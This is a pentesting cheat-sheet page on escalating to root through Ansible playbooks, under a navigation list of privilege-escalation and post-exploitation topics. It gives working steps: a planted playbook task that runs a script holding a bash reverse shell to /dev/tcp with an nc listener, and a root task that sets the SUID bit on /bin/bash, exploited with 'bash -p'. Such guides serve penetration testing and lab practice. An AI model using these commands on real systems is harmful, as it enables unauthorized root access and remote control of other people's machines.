Privilege Escalation

Ansible Playbook Privilege Escalation

Apache Conf Privilege Escalation

Bash eq Privilege Escalation

Buffer Overflow Privilege Escalation

Chrome Remote Debugger Pentesting

Doas Privilege Escalation

Ghidra Debug Mode RCE

Gnuplot Privilege Escalation

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Linux Privilege Escalation

Mozilla Pentesting

OpenSSL Privilege Escalation

Pip Download Code Execution

PolKit Privilege Escalation

Python Eval Code Execution

Python Jails Escape

Python Privilege Escalation

Python Yaml Privilege Escalation

Ruby Privilege Escalation

Rust Privilege Escalation

SSSD Privilege Escalation

Shared Library Hijacking

Snapd Privilege Escalation

Sudo ClamAV Privilege Escalation

Sudo Dstat Privilege Escalation

Sudo Exiftool Privilege Escalation

Sudo Fail2ban Privilege Escalation

Sudo Git Privilege Escalation

Sudo Java Privilege Escalation

Sudo OpenVPN Privilege Escalation

Sudo Path Traversal Privilege Escalation

Sudo Privilege Escalation

Sudo Privilege Escalation by Overriding Shared Library

Sudo Reboot Privilege Escalation

Sudo Screen Privilege Escalation

Sudo Service Privilege Escalation

Sudo Shutdown, Poweroff Privilege Escalation

Sudo Systemctl Privilege Escalation

Sudo Tee Privilege Escalation

Sudo Umount Privilege Escalation

Sudo Vim Privilege Escalation

Sudo Wall Privilege Escalation

Sudo Wget Privilege Escalation

Sudoedit Privilege Escalation

Tar Wildcard Injection PrivEsc

Update-Motd Privilege Escalation

irb (Interactive Ruby Shell) Privilege Escalation

Post Exploitation

Cover Your Tracks in Linux

Linux Backdoors

Linux Pivoting

Backup

BorgBackup Pentesting

Container

LXC/LXD (Linux Container/Daemon) Privilege Escalation

Archive

7z

Bzip2 & Bunzip2

Crack 7z Password

Crack Zip Password

Gzip & Gunzip

Tar

Zip & Unzip

Attack

Fork Bomb

Protocol

X11 (X Window System) Pentesting

Management

Add & Delete Groups in Linux

Add & Delete Users in Linux

File & Directory Ownership in Linux

File & Directory Permission in Linux

File Transfer in Linux

Shell Scripting

Ansible Playbook Privilege Escalation

Last modified: 2023-03-14

Privilege Escalation

Ansible Playbooks are lists of tasks that automatically execute against hosts.

PrivEsc with Tasks

First off, check the content of playbook in /opt/ansible/playbooks.
For instance, a file named “httpd.yaml”.

- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...

Next, check the content of configure files in /opt/ansible/roles/geerlingguy.apache/tasks.
And add the exploitable file in this.
For example, a file named “shell.yml”.

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh

Create a exploit for reverse shell.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh

Then open a listener in local machine.

nc -lvnp <local-port>

At the end, execute “ansible”

ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible

PrivEsc with Automation Task

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (tasks/), we can inject arbitrary commands in yaml file.
For example, create a new file /opt/ansible/tasks/evil.yaml.

- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true

After a while, we can escalate the root privilege by executing the following command.

/bin/bash -p

ON THIS PAGE

PrivEsc with Tasks PrivEsc with Automation Task